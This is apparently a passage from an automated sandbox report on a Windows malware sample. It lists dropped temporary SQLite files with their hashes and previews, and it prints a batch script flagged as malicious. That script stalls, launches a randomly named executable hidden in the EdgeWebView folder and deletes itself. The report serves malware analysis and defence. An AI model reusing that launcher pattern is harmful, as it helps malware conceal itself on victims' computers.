                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Wd21UKjUBG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\WhZzmRmhX0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\WvjJjyhG1I

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Wx32mWWG2I

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\X2Hd3htCQ5

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\XByK8tQfsQ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\XLzoP3YFzH

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\XZZaUDirwL

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\XqgV89dRYn

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Y4LAB8OGEp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\YRBlKWBLGu

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\YwJHpioC9r

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Z5uBh82OsI

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Z7C04hzCNH

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ZCYqTuZ6oZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ZK0DCrKMLF

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ZOb9E1tnXb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ZPcw4W5koV

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ZzXGUxQmSx

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):261
                                                                                                                          Entropy (8bit):5.352179636939925
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hCijTg3Nou1SV+DER5I3uTttIcDkZKOZG1wkn23fcl:HTg9uYDEfTJtIACfc
                                                                                                                          MD5:46B62FAA9403FB28F608E24AA3FAEE77
                                                                                                                          SHA1:83BE570E445A19597F351B42AAF5B273891506A7
                                                                                                                          SHA-256:7B98E612AEEA380936B0C4526E5ACE1FE0947649B38B3E75144E83AEEEC11D8B
                                                                                                                          SHA-512:FFD563152C0E7A44D2234D9EF8F2A09705F984318986AD27A2062C2C6396C381C2F044F2CACCE3A5B15492CDC67DFFB36D1ADC304DD43F2ED3005C551573D4E8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aD6W5T5CI2.bat"

                                                                                                                          C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.0.cs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):397
                                                                                                                          Entropy (8bit):4.899418136882753
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6L/luaiFkD:JNVQIbSfhV7TiFkMSfhWLtu7FkD
                                                                                                                          MD5:63DE7D03D1ADFC3043C7C54075747610
                                                                                                                          SHA1:7329C4C34EEF7C7EA1F54F963B2619B31AED2D53
                                                                                                                          SHA-256:ECDEC23E6D08327B3728F824B00C9DF44542C6846E3F1E9FC1A7E5F64A28D99C
